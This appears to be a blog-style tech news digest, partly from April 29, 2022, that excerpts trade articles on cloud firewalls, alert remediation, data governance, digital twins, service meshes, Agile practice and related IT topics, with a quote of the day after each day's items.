As cloud solutions continued to evolve, cloud-based security services had to follow their lead and this is how firewall as a service (FWaaS) came into existence. In short, FWaaS took the last stage of firewall evolution - the next-generation firewall (NGFW) - and moved it from a physical device to the cloud. There are plenty of benefits of employing FWaaS in your systems in place of an old-fashioned firewall and some of them are simplicity, superior scalability, improved visibility and control, protection of remote workers, and cost-effectiveness. ... Unlike old-fashioned firewalls, Perimeter 81’s solution can safeguard multiple networks and control access to all data and resources of an organization. Some of its core features include identity-based access, global gateways, precise network segmentation, object-based configuration management, multi-site management, protected DNS system, safe remote work, a wide variety of integrations, flexible features, and scalable pricing. ... Secucloud’s FWaaS is a zero-trust, next-gen, AI-based solution that utilizes threat intelligence feed, secures traffic through its own VPN tunnel, and operates as a proxy providing an additional layer of security to your infrastructure.


Automated Security Alert Remediation: A Closer Look

To properly implement automatic security alert remediation, you must choose the remediation workflow that works best for your organization. Alert management works with workflows that are scripted to match a certain rule to identify possible vulnerabilities and execute resolution tasks. With automation, workflows are automatically triggered by following asset rules and constantly inspecting the remediation activity logs to execute remediation. To improve mean time to response and remediation, organizations create automated remediation workflows. For example, remediation alert playbooks aid in investigating events, blocking IP addresses or adding an IOC on a cloud firewall. There are also interactive playbooks that can help remediate issues like a DLP incident on a SaaS platform while also educating the user via dynamic interactions using the company’s communication tools. The typical alert remediation workflow consists of multiple steps. It begins with the creation of a new asset policy followed by the selection of a remediation action rule and concludes with the continued observation of the automatically quarantined rules.


Experts outline keys for strong data governance framework

It's needed to manage risk, which could be anything from the use of low-quality data that leads to a bad decision to potentially running afoul of regulatory restrictions. And it's also needed to foster informed decisions that lead to growth. But setting limits on which employees can use what data, while further limiting how certain employees can use data depending on their roles, and simultaneously encouraging those same employees to explore and innovate with data are seemingly opposing principles. So a good data governance framework finds an equilibrium between risk management and enablement, according to Sean Hewitt, president and CEO of Succeed Data Governance Services, who spoke during a virtual event on April 26 hosted by Eckerson Group on data governance. A good data governance framework instills confidence in employees that whatever data exploration and decision-making they do in their roles, they're doing so with proper governance guardrails in place so they're exploring and making decisions safely and securely and won't hurt their organization.


Augmented data management: Data fabric versus data mesh

The data fabric architectural approach can simplify data access in an organization and facilitate self-service data consumption at scale. This approach breaks down data silos, allowing for new opportunities to shape data governance, data integration, single customer views and trustworthy AI implementations among other common industry use cases. Since its uniquely metadata-driven, the abstraction layer of a data fabric makes it easier to model, integrate and query any data sources, build data pipelines, and integrate data in real-time. A data fabric also streamlines deriving insights from data through better data observability and data quality by automating manual tasks across data platforms using machine learning. ... The data mesh architecture is an approach that aligns data sources by business domains, or functions, with data owners. With data ownership decentralization, data owners can create data products for their respective domains, meaning data consumers, both data scientist and business users, can use a combination of these data products for data analytics and data science.


Embracing the Platinum Rule for Data

It’s much easier to innovate around one platform and one set of data. Making this a business and not an IT imperative, you can connect data into the applications that matter. For example, creating a streamlined procure-to-pay and order-to-cash process is possible only because we’ve broken down data silos. We are now capable of distributing new customer orders to the optimum distribution facility based on the final destination and available inventory in minutes vs. multiple phone calls and data entry in multiple systems that previously would have taken hours and resources. The speed and effectiveness of these processes has led to multiple customer awards. Our teams need to store data in ways that is harmonized before our users start to digest and analyze the information. Today many organizations have data in multiple data lakes and data warehouses, which increases the time to insights and increases the chance for error because of multiple data formats. ... As data flows through Prism, we’re able to visualize that same data across multiple platforms while being confident in one source of the truth.


The Purpose of Enterprise Architecture

The primary purpose of the models is to facilitate the architect to understand the system being examined. Understand how it works today, understand how it can be most effectively changed to reach the aspirations of the stakeholders, and understand the implications and impacts of the change. A secondary purpose is re-use. It is simply inefficient to re-describe the Enterprise. The efficiency of consistency is balanced against the extra energy to describe more than is needed, and to train those who describe and read the descriptions on formal modeling. The size, geographic distribution, and purpose of the EA team will dramatically impact the level of consistency and formality required. Formal models are substantially more re-usable than informal models. Formal models are substantially easier to extend across work teams. The penalty is that formal models require semantic precision. For example, regardless of the structure of an application in the real world, it must be represented in a model conforming to the formal definition. This representation is possible with a good model definition.


Staying Agile: Five Trends for Enterprise Architecture

Continuous improvement is a cornerstone of agile digital business design. Organizations want to deliver more change, with higher quality results, simultaneously. Progressive, mature EAs are now designing the system that builds the system, redesigning and refactoring the enterprise’s way-of-working. This goal is a fundamental driver for many of these trends. In the pursuit of this trend, it’s important to remember that the perfect business design isn’t easily achievable. Trying one approach, learning through continuous feedback and making adjustments is a rinse and repeat process. For example, a business might use the Team Topologies technique to analyze the types of work that teams are performing and then reorganize those teams to in order to minimize cognitive loads – for instance by assigning one set of teams to focus on a particular value stream while others focus solely on enabling technical capabilities. These adjustments might need to happen multiple times until the right balance is found to ensure optimal delivery of customer value and team autonomy.


Blockchain and GDPR

Given that the ruling grants EU persons the right to contest automated decisions, and smart contracts running on a blockchain are effectively making automated decisions, the GDPR needs to be taken in to account when developing and deploying smart contracts that use personal data in the decision making process, and produce a legal effect or other similarly significant effect.Smart contract over-rides. The simplest means of ensuring smart contract compliance is to include code within the contract that allows a contract owner to reverse any transaction conducted. There are however a number of problems that could arise from this. ... As the appeal time can be long, many such actions may have been taken after the original contract decision, and it may not even be possible to roll back all the actions. Consent and contractual law. A second approach is to ensure that the users activating the smart contract are aware that they are entering into such a contract, and that they provide explicit consent. The GDPR provides the possibility of waiving the contesting of automated decisions under such terms, but the smart contract would require putting on hold any subsequent actions to be taken until consent is obtained.



Quote for the day:

"Making good decisions is a crucial skill at every level." -- Peter Drucker

Daily Tech Digest - April 29, 2022

Scrumfall: When Agile becomes Waterfall by another name

Agile is supposed to be centered on people, not processes — on people collaborating closely to solve problems together in a culture of autonomy and mutual respect, a sustainable culture that values the health, growth, and satisfaction of every individual. There is a faith embedded in the manifesto that this approach to software engineering is both necessary and superior to older models, such as Waterfall. Necessary because of the inherent complexity and indeterminacy of software engineering. Superior because it leverages the full collaborative might of everyone’s intelligence. But this is secondary to Agile’s most fundamental idea: We value people. It’s a rare employer today who doesn’t pay lip service to that idea. “We value our people.” But many businesses instead prioritize controlling their commodity human resources. This now being unacceptable to say out loud — in software engineering circles as in much of modern America — many companies have dressed it up in Scrum’s clothing, claiming Agile ideology while reasserting Waterfall’s hierarchical micromanagement.


Nerd Cells, ‘Super-Calculating’ Network in the Human Brain Discovered

After five years of research into the theory of the continuous attractor network, or CAN, Charlotte Boccara and her group of scientists at the Institute of Basic Medical Sciences at the University of Oslo, now at the Center for Molecular Medicine Norway (NCMM), have made a breakthrough. “We are the first to clearly establish that the human brain actually contains such ‘nerd cells’ or ‘super-calculators’ put forward by the CAN theory. We found nerve cells that code for speed, position and direction all at once,” says Boccara. ... The CAN theory hypothesizes that a hidden layer of nerve cells perform complex math and compile vast amounts of information about speed, position and direction, just as NASA’s scientists do when they are adjusting a rocket trajectory. “Previously, the existence of the hidden layer was only a theory for which no clear proof existed. Now we have succeeded in finding robust evidence for the actual existence of such a brain’s ‘nerd center,'” says the researcher,—and as such we fill in a piece of the puzzle that was missing.


Data Center Sustainability Using Digital Twins And Seagate Data Center Sustainability

Rozmanith said that Dessault’s digital twins data center construction simulation reduced time to market by 15%. He also said that the modular approach reduces design time by 20%. Their overall goal is to shorten data center stand-up time by 50% and reduce the waste commonly generated in data center construction. Even after construction, digital twins for the operation of a data center will be useful for evaluating and planning future upgrades and data center changes. Some data center companies, such as Apple have designed their data centers to be 100% sustainable for several years. Seagate recently announced that it would power its global footprint with 100% renewable energy by 2030 and achieve carbon neutrality by 2040. These goals were announced in conjunction with the release of the company’s 16th Global Citizenship Annual Report. That report included a look at the company’s annual progress towards meeting emission reduction targets, product stewardship, talent enablement, diversity goals, labor standards, fair trade, supply chain, and more.


Industry 4.0 – why smart manufacturing is moving closer to the edge

With Industry 4.0, new technologies are being built into the factory to drive increased automation. This all leads to potentially smart factories that can, for instance, benefit from predictive maintenance, as well as improved quality assurance and worker safety. At the same time, existing data challenges can be overcome. Companies operating across multiple locations often struggle to remove data silos and bring IT and OT (operational technology) together. An edge based on an open hybrid infrastructure can help them do this, as well as solving other problems. These problems include reducing latency as a result of supporting a horizontal data framework across the organization's entire IT infrastructure, instead of relying on data being funneled through a centralized network that can cause bottlenecks. Edge computing opens hybrid-aligned to cloud services can also reduce the amount of mismatched and inefficient hardware that has gradually built up, and which is located in often tight remote spaces too.


Digital twins: The art of the possible in product development and beyond

Digital twins are increasingly being used to improve future product generations. An electric-vehicle (EV) manufacturer, for example, uses live data from more than 80 sensors to track energy consumption under different driving regimes and in varying weather conditions. Analysis of that data allows it to upgrade its vehicle control software, with some updates introduced into new vehicles and others delivered over the air to existing customers. Developers of autonomous-driving systems, meanwhile, are increasingly developing their technology in virtual environments. The training and validation of algorithms in a simulated environment is safer and cheaper than real-world tests. Moreover, the ability to run numerous simulations in parallel has accelerated the testing process by more than 10,000 times. ... The adoption of digital twins is currently gaining momentum across industries, as companies aim to reap the benefits of various types of digital twins. Given the many different shapes and forms of digital twins, and the different starting points of each organization, a clear strategy is needed to help prioritize where to focus digital-twin development and what steps to take to capture the most value.


What Is Cloud-Native?

Cloud-native, according to most definitions, is an approach to software design, implementation, and deployment that aims to take full advantage of cloud-based services and delivery models. Cloud-native applications also typically operate using a distributed architecture. That means that application functionality is broken into multiple services, which are then spread across a hosting environment instead of being consolidated on a single server. Somewhat confusingly, cloud-native applications don't necessarily run in the cloud. It's possible to build an application according to cloud-native principles and deploy it on-premises using a platform such as Kubernetes, which mimics the distributed, service-based delivery model of cloud environments. Nonetheless, most cloud-native applications run in the cloud. And any application designed according to cloud-native principles is certainly capable of running in the cloud. ... Cloud-native is a high-level concept rather than a specific type of application architecture, design, or delivery process. Thus, there are multiple ways to create cloud-native software and a variety of tools that can help do it.


Predictive Analytics Could Very Well Be The Future Of Cybersecurity

Predictive analytics is gaining momentum in every industry, enabling organizations to streamline the way they do business. This branch of advanced analytics is concerned with the use of data, statistical algorithms, and machine learning to determine future performance. When it comes to data breaches, predictive analytics is making waves. Enterprises with a limited security staff can stay safe from intricate attacks. Predictive analytics tells them where threat actors tried to attack in the past, so it helps to see where they’ll strike next. Good security starts with knowing what attacks are to be feared. The conventional approach to fighting cybercrime is collecting data about malware, data breaches, phishing campaigns, and so on. Relevant information is extracted from those signatures. By signatures, it’s meant a one-of-a-kind arrangement of information that can be used to identify a cybercriminal’s attempt to exploit an operating system or an app’s vulnerability. The signatures can be compared against files, network traffic, and emails that flow in and out of the network to detect abnormalities. Everyone has distinct usage habits that technology can learn.


A Shift in Computer Vision is Coming

Neuromorphic technologies are those inspired by biological systems, including the ultimate computer, the brain and its compute elements, the neurons. The problem is that no–one fully understands exactly how neurons work. While we know that neurons act on incoming electrical signals called spikes, until relatively recently, researchers characterized neurons as rather sloppy, thinking only the number of spikes mattered. This hypothesis persisted for decades. More recent work has proven that the timing of these spikes is absolutely critical, and that the architecture of the brain is creating delays in these spikes to encode information. Today’s spiking neural networks, which emulate the spike signals seen in the brain, are simplified versions of the real thing — often binary representations of spikes. “I receive a 1, I wake up, I compute, I sleep,” Benosman explained. The reality is much more complex. When a spike arrives, the neuron starts integrating the value of the spike over time; there is also leakage from the neuron meaning the result is dynamic. There are also around 50 different types of neurons with 50 different integration profiles.


Implementing a Secure Service Mesh

One of our main goals with using a service mesh was to get Mutual Transport Layer Security (mTLS) between internal pod services for security. However, using a service mesh provides many other benefits because it allows workloads to talk between multiple Kubernetes clusters or run 100% bare-metal apps connected to Kubernetes. It offers tracing, logging around connections between pods, and it can output connection endpoint health metrics to Prometheus. This diagram shows what a workload might look like before implementing a service mesh. In the example on the left, teams are spending time building pipes instead of building products or services, common functionality is duplicated across services, there are inconsistent security and observability practices, and there are black-box implementations with no visibility. On the right, after implementing a service mesh, the same team can focus on building products and services. They’re able to build efficient distributed architectures that are ready to scale, observability is consistent across multiple platforms, and it’s easier to enforce security and compliance best practices.


5 Must-Have Features of Backup as a Service For Hybrid Environments

New backup as a service offerings have redefined backup and recovery with the simplicity and flexibility of the cloud experience. Cloud-native services can eliminate complexity of protecting your data and free you from the day-to-day hassles of managing the backup infrastructure. The innovative approach to backup lets you meet SLAs in hybrid cloud environments, and simplifies your infrastructure, driving significant value for your organization. Resilient data protection is key to always-on availability for data and applications in today’s changing hybrid cloud environments. While every organization has its own set of requirements, I would advise you to focus on cost efficiency, simplicity, performance, scalability, and future-readiness when architecting your strategy and evaluating new technologies. The simplest choice: A backup as a service solution that integrates all of these features in a pay-as-you-go consumption model. Modern solutions are architected to support today’s challenging IT environments.



Quote for the day:

"Leadership is like beauty; it's hard to define, but you know it when you see it." -- Warren Bennis